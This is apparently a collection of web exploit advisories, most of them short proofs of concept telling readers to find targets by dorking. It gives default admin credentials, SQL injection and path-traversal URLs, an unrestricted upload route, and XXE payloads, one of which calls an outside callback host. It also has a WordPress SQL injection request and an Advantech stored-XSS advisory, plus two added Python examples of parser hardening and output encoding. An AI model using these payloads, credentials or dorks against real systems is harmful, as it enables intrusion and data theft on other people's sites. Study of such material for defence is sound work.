<pre><code>====================================================================================================================================<br />| # Title : Ekushey Project Manager CRM V3.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 66.0.2 (32-bit) | <br />| # Vendor : http://creativeitem.com/ | <br />| # Dork : "Login | Ekushey Project Manager CRM" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] The application leaves a default administrative account in place after installation.<br /><br />[+] Default credentials: user admin@example.com / pass 1234<br /><br />[+] Admin panel: http://127.0.0.1/Ekushey/index.php?admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : E-Journal homoeo CMS v2.0.3 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 69.0 (32-bit) | <br />| # Vendor : http://prosoftsolution.in// | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] Injection point: the job_id parameter of job_detail.php (a single quote breaks the query).<br /><br />[+] https://127.0.0.1/homoeoaddain/job_detail.php?job_id=214%27 <====| inject here<br /><br />[+] Admin panel: /adminsys/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : EI Tube YouTube API V3 site builder SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 63.0.3 (32-bit) | <br />| # Vendor : https://pomento.in/ei-tube-youtube-api-v3-site-builder/?v=fa3c7f2b5dae | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] Injection point: the page parameter of /watch; a URL-encoded backslash (%5c) breaks the query.<br /><br />[+] https://127.0.0.1/ei-tubecom/watch?page=%5c<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : E-Fun CMS V5.0 XML External Entity Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.e-fun.com.tw/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] Vulnerability description :<br /><br />XML supports a facility known as "external entities", <br />which instruct an XML processor to retrieve and perform <br />an inline include of XML located at a particular URI. <br />An external XML entity can be used to append or modify <br />the document type declaration (DTD) associated with an <br />XML document. An external XML entity can also be used <br />to include XML within the content of an XML document. <br /><br />Now assume that the XML processor parses data originating <br />from a source under attacker control. Most of the time <br />the processor will not be validating, but it MAY still <br />substitute the replacement text, thus initiating an unexpected <br />file open, an HTTP transfer, or a fetch of whatever other <br />system identifier (URI scheme) the XML processor knows how to access.
<br /><br />Below is a sample XML document that uses this functionality <br />to include the contents of a local file (/etc/passwd):<br /><br />target : http://127.0.0.1/landtopcomtw/webadmin/<br /><br /><?xml version="1.0" encoding="utf-8"?><br /><!DOCTYPE indoushka [<br /> <!ENTITY indoushka SYSTEM "file:///etc/passwd"><br />]><br /><xxx>&indoushka;</xxx><br /><br />The request below is the blind (out-of-band) variant: the entity's SYSTEM <br />identifier is an attacker-controlled HTTP URL, so a DNS or HTTP callback <br />to that host proves the parser resolves external entities even when <br />nothing is reflected in the response.<br /><br />POST /webadmin/_chkpasswd.php HTTP/1.1<br />Content-type: text/xml<br />Host: landtop.com.tw<br />Content-Length: 175<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br /><?xml version="1.0" encoding="utf-8"?><br /><!DOCTYPE dt5fqyt [<br /> <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/"><br />]><br /><_chkpasswd.php>&dt5fqytent;</_chkpasswd.php><br /><br /><br />[+] Affected items :<br /><br />/webadmin/ <br />/webadmin/_chkpasswd.php <br />/webadmin/index.php <br /><br />[+] The impact of this vulnerability :<br /><br />Attacks can include disclosing local files, <br />which may contain sensitive data such as passwords <br />or private user data, using file: schemes or relative <br />paths in the system identifier. Since the attack occurs <br />relative to the application processing the XML document, <br />an attacker may use this trusted application to pivot <br />to other internal systems, possibly disclosing <br />other internal content via http(s) requests.<br /><br />[+] How to fix this vulnerability :<br /><br />Disable DTD processing, or at minimum external entity resolution, in the <br />XML parser behind /webadmin/_chkpasswd.php. Every common parser exposes a <br />switch for this; rejecting any document that carries a DOCTYPE is the <br />simplest safe policy, and it also stops internal entity expansion attacks.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
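<p>The description above, worked through in code. This is an added example, not code from the advisory or from E-Fun: the "vulnerable" parser is a deliberately entity-resolving expat configuration that does exactly what the text describes (it fetches the SYSTEM identifier and splices the result into the document), and the hardened parser beside it refuses any DOCTYPE. The secret file is a constructed temporary file standing in for /etc/passwd; the function names and the hypothetical form field are this example's own.</p>

```python
"""Added example: what an XML processor does when it resolves an external
general entity (XXE), next to a parser configured so that it cannot."""
import os
import tempfile
import urllib.request
import xml.parsers.expat as expat


class ForbiddenDTD(Exception):
    """Raised by the hardened parser when the document declares a DOCTYPE."""


def xxe_document(system_id):
    """Same shape as the advisory's PoC: an external general entity whose
    SYSTEM id is the resource to exfiltrate, referenced in element content."""
    return (
        b'<?xml version="1.0" encoding="utf-8"?>\n'
        b"<!DOCTYPE xxx [\n"
        b'  <!ENTITY xxe SYSTEM "' + system_id.encode() + b'">\n'
        b"]>\n"
        b"<xxx>&xxe;</xxx>\n"
    )


def write_secret(content):
    """Constructed stand-in for /etc/passwd; returns its file:// URI."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return "file://" + path


def _parser_with_text_sink():
    p = expat.ParserCreate()
    p.buffer_text = True
    chunks = []
    p.CharacterDataHandler = chunks.append  # collects element text
    return p, chunks


def parse_resolving_entities(xml_bytes):
    """VULNERABLE: resolve external entities by fetching their SYSTEM id."""
    p, chunks = _parser_with_text_sink()

    def fetch(context, base, system_id, public_id):
        # This is the step that turns a document into a file read or an HTTP
        # request: every scheme urllib knows (file:, http:, ftp:) is reachable.
        # The advisory's second PoC relies on the http: case: the callback
        # alone proves resolution even when nothing is reflected back.
        with urllib.request.urlopen(system_id) as resp:
            replacement = resp.read()
        child = p.ExternalEntityParserCreate(context)  # shares our handlers
        child.Parse(replacement, True)  # fetched text lands in `chunks`
        return 1

    p.ExternalEntityRefHandler = fetch
    p.Parse(xml_bytes, True)
    return "".join(chunks)


def parse_hardened(xml_bytes):
    """HARDENED: refuse any DOCTYPE (so neither external entities nor
    internal expansion bombs can be declared) and never follow references."""
    p, chunks = _parser_with_text_sink()

    def reject(doctype_name, system_id, public_id, has_internal_subset):
        raise ForbiddenDTD(f"DOCTYPE {doctype_name!r} not allowed")

    p.StartDoctypeDeclHandler = reject
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    # Belt and braces: if a reference were ever reached, skip it silently.
    p.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 1
    p.Parse(xml_bytes, True)
    return "".join(chunks)


def hardened_rejects(xml_bytes):
    """True if the hardened parser refuses the document."""
    try:
        parse_hardened(xml_bytes)
    except ForbiddenDTD:
        return True
    return False


if __name__ == "__main__":
    uri = write_secret(b"root:x:0:0:root:/root:/bin/bash\n")  # constructed
    doc = xxe_document(uri)
    print("vulnerable parser returned:", parse_resolving_entities(doc).strip())
    print("hardened parser rejected it:", hardened_rejects(doc))
```

<p>The vulnerable path is the one the advisory's PoC exercises: the entity's replacement text is whatever the fetch returns, and it becomes part of the document the application then processes or echoes. Note that the fix is a parser setting, not input filtering; the hardened function raises on the DOCTYPE before any entity is declared, which is the behaviour libraries such as defusedxml implement.</p>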
<pre><code># Exploit Title: WordPress Core 5.6.2 - Xpath Injection<br /># Date: 13/08/2023<br /># Exploit Author: Behrouz Mansoori<br /># Vendor Homepage: https://wordpress.org<br /># Software Link: https://wordpress.org/download/releases<br /># Version: 5.6.2<br /># Tested on: Mac<br /><br /># [ VULNERABILITY DETAILS ] : <br /><br /># This vulnerability allows remote attackers to disclose sensitive information from affected installations of WordPress Core.<br /># The issue results from the lack of proper validation of a user-supplied string (the login name, the log parameter below) before it is used to construct SQL queries.<br /># The payload is MySQL error-based injection: extractvalue() is handed an invalid XPath expression built from concat(0x7e, version()), so the database's "XPATH syntax error" message carries the query result back in the response.<br /># An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.<br /><br /># [ Sample Request ] :<br /><br />POST /wp-login.php HTTP/2<br />Host: localhost<br />Cookie: wordpress_test_cookie=WP%20Cookie%20check<br />Content-Length: 125<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: <br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: ""<br />Upgrade-Insecure-Requests: 1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />log=test' and extractvalue (rand(), concat (0x7e, version () ))--+&pwd=test&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=https%3A%2F%2Ftarget_site%2Fwp-admin%2F&testcookie=1<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Education Time Indonesian School CRM v1.7 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 64.0.2 (32-bit) |<br />| # Vendor : http://p30vel.ir | <br />| # Dork : "media.php?module=detailberita&id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] The file parameter of downlot.php is used as a path without sanitisation, so ../ sequences walk out of the intended directory: downlot.php?file=../../../../../../../../../../etc/passwd<br /><br />[+] http://target_site/unit/spi/downlot.php?file=../../../../../../../../../../etc/passwd<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : doorGets CMS v7.0 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 65.0 (32-bit) | <br />| # Vendor : https://doorgets.io/t/en/ | <br />| # Dork : "Powered with doorGets ™" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] Register a new user: http://127.0.0.1/bestwayschoolcom/dg-user/en/?controller=authentification&action=register<br /><br />[+] Follow the confirmation link in the e-mail.<br /><br />[+] After logging in, open your profile: http://127.0.0.1/eXplored/dg-user/en/?controller=account <br /><br />[+] Under the parameters, choose an HTML editor (editor tinymce) and press Save.<br /><br />[+] Create a new blog post: http://127.0.0.1/eXplored/dg-user/en/?controller=moduleblog&uri=blog&action=add<br /><br />[+] Upload your malicious file through the editor; extensions such as .php2, .html and .svg are not blocked.<br /><br />[+] Uploaded files are served from http://127.0.0.1/fileman/Uploads/ and can be executed remotely.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Datoo - Complete Dating Script v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.codelist.cc/scripts/232821-datoo-v10-complete-dating-script.html | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] The application leaves a default administrative account in place after installation.<br /><br />[+] Default credentials: user admin@admin.com / pass admin<br /><br />[+] Admin panel: https://target_site/admin/dashboard.php <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CSC-CMS v1.0.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 68.0 (32-bit) |<br />| # Vendor : http://creativesales.hu/ | <br />| # Dork : A honlapot a Creative Sales Consulting készítette. (Hungarian: "The website was made by Creative Sales Consulting.") |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] The application appears to leave default credentials in place after installation.<br /><br />[+] Default credentials: user admin / pass adminpass<br /><br />[+] Admin panel: https://127.0.0.1/viprexhu/admin/index.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>St. Pölten UAS<br />-------------------------------------------------------------------------------<br />             title| Multiple XSS in Advantech<br />           product| Advantech EKI-1524-CE series, EKI-1522 series,<br />                  | EKI-1521 series<br />vulnerable version| <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203)<br />     fixed version| 1.26<br />        CVE number| CVE-2023-4202, CVE-2023-4203<br />            impact| Medium<br />          homepage| https://advantech.com<br />             found| 2023-05-04<br />                by| R. Haas, A. Resanovic, T. Etzenberger, M. Bineder<br />                  | This vulnerability was discovered during research at<br />                  | St. Pölten UAS, supported and coordinated by CyberDanube.<br />                  |<br />                  | https://fhstp.ac.at | https://cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />“Advantech’s corporate vision is to enable an intelligent planet. The company<br />is a global leader in the fields of IoT intelligent systems and embedded<br />platforms. To embrace the trends of IoT, big data, and artificial intelligence,<br />Advantech promotes IoT hardware and software solutions with the Edge<br />Intelligence WISE-PaaS core to assist business partners and clients in<br />connecting their industrial chains.
Advantech is also working with business<br />partners to co-create business ecosystems that accelerate the goal of<br />industrial intelligence.”<br /><br />Source: https://www.advantech.com/en/about<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />EKI-1524-CE series / 1.21 (CVE-2023-4202)<br />EKI-1522-CE series / 1.21 (CVE-2023-4202)<br />EKI-1521-CE series / 1.21 (CVE-2023-4202)<br /><br />EKI-1524-CE series / 1.24 (CVE-2023-4203)<br />EKI-1522-CE series / 1.24 (CVE-2023-4203)<br />EKI-1521-CE series / 1.24 (CVE-2023-4203)<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)<br />Two stored cross-site scripting vulnerabilities have been identified in the<br />firmware of the device. The first was found in the "Device Name" field and<br />the second in the "Ping" tool. Because the payload is stored on the device,<br />it executes in the browser of every user who later views the affected page,<br />i.e. in the context of the victim's session.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (XSS)<br />Both payloads persist on the device and fire on every subsequent page load.<br /><br />1.1) Stored XSS in Device Name CVE-2023-4202<br />The first vulnerability can be triggered by setting the device name<br />("System->Device Name") to the following value:<br />"><script>alert("document.cookie")</script><br /><br />The leading "> closes the attribute and tag the name is rendered into, so<br />the script element that follows is parsed as markup and executes. As written,<br />the alert shows the literal text document.cookie (the argument is a quoted<br />string); without the quotes it would display the cookies readable by script.<br /><br />1.2) Stored XSS in Ping Function CVE-2023-4203<br />The second XSS vulnerability can be found in "Tools->Ping".
The following GET<br />request to the ping CGI carries the payload in the ip parameter; when the<br />result is rendered, the injected script executes (here alert(1)):<br /><br />http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513<br /><br />An alternative to the script tag is an event-handler attribute. The payload<br />below closes the attribute value and adds an "onmousemove" handler, which<br />alerts the number "1337" as soon as the mouse moves over the element:<br />" onmousemove="alert(1337)"<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Upgrade to the newest available firmware.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />Advantech customers are advised to upgrade the firmware to the latest<br />available version.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2023-05-16: Contacting vendor via security contact.<br />2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21.<br />            The contact is trying to reproduce issue 1.2; gave advice to<br />            reproduce the issue.<br />2023-05-25: Contact stated that new firmware should resolve the issue.<br />2023-06-03: Sent new payload to the vendor.<br />2023-06-05: Vendor asked for clarification; sent further explanation to the<br />            contact; vendor contact said he knows a solution.<br />2023-06-22: Asked for an update; contact stated that the beta firmware should<br />            resolve the issues.<br />2023-06-27: Asked for the release date.<br />2023-07-04: Contact stated that they are currently doing QA tests.<br />2023-07-06: Asked if issue 1.1 is really resolved so that it can be released;<br />            vendor stated that it can be published.<br />2023-07-17: Assigned CVE numbers for the issues. Asked for an update.<br />2023-07-18: Vendor contact stated that the firmware will be released at the<br />            end of July.<br />2023-08-07: Asked contact for the new firmware version.<br />2023-08-08: Received version 1.26 as the officially released firmware with<br />            fixes. Coordinated release of security advisory.<br /><br /><br /><br />Web: https://www.fhstp.ac.at/<br />Twitter: https://twitter.com/fh_stpoelten<br />Mail: mis at fhstp dot ac dot at<br /><br />EOF T. Weber / @2023<br /><br /><br /></code></pre>
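<p>The two injection contexts from sections 1.1 and 1.2 above, reproduced in code. This is an added example, not code from the advisory, St. Pölten UAS or Advantech: the two render functions are hypothetical stand-ins for the EKI web UI's device-name form field and ping result page (their markup is assumed, the firmware's real templates are not public), and the audit helper uses Python's stdlib HTML tokenizer to show what a browser would build from each rendering. The payload strings are the ones quoted in the advisory.</p>

```python
"""Added example: why the advisory's payloads work in an attribute context
and an element-text context, and what output encoding does to them."""
import html
from html.parser import HTMLParser

# Payloads quoted in the advisory (sections 1.1 and 1.2).
DEVICE_NAME_SCRIPT = '"><script>alert("document.cookie")</script>'
DEVICE_NAME_EVENT = '" onmousemove="alert(1337)"'
PING_IP = "172.16.0.141; <script>alert(1)</script>"  # %3b%20 decoded


def render_device_name(name, encode):
    """Hypothetical 'System -> Device Name' form field (attribute context).
    encode=False pastes the stored value verbatim, like the vulnerable
    firmware; encode=True escapes & < > " so the value cannot leave the
    attribute."""
    value = html.escape(name, quote=True) if encode else name
    return f'<input type="text" name="device_name" value="{value}">'


def render_ping_output(ip, encode):
    """Hypothetical 'Tools -> Ping' result page (element text context)."""
    shown = html.escape(ip, quote=False) if encode else ip
    return f"<pre>PING {shown} 56(84) bytes of data.</pre>"


class _Audit(HTMLParser):
    """Records the tags, event-handler attributes and input values a browser
    would construct from the markup (html.parser unescapes attribute values
    the same way a browser does)."""

    def __init__(self):
        super().__init__()
        self.tags, self.event_attrs, self.values = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for key, val in attrs:
            if key.startswith("on"):
                self.event_attrs.append(key)
            if tag == "input" and key == "value":
                self.values.append(val)


def audit(markup):
    """Return what the tokenizer sees: tags, on* attributes, input values."""
    a = _Audit()
    a.feed(markup)
    a.close()
    return {"tags": a.tags, "event_attrs": a.event_attrs, "values": a.values}


if __name__ == "__main__":
    for payload in (DEVICE_NAME_SCRIPT, DEVICE_NAME_EVENT):
        for encode in (False, True):
            print("device name, encode=%s:" % encode,
                  audit(render_device_name(payload, encode)))
    for encode in (False, True):
        print("ping output, encode=%s:" % encode,
              audit(render_ping_output(PING_IP, encode)))
```

<p>Unencoded, the first device-name payload yields a second element (script) and the second yields an onmousemove attribute on the input; encoded, both come back as a single input whose value attribute round-trips to the exact string the user typed, which is the correct behaviour for a name field. The ping case needs only the text-context escape of &lt;, but escaping quotes as well costs nothing and covers the attribute case too.</p>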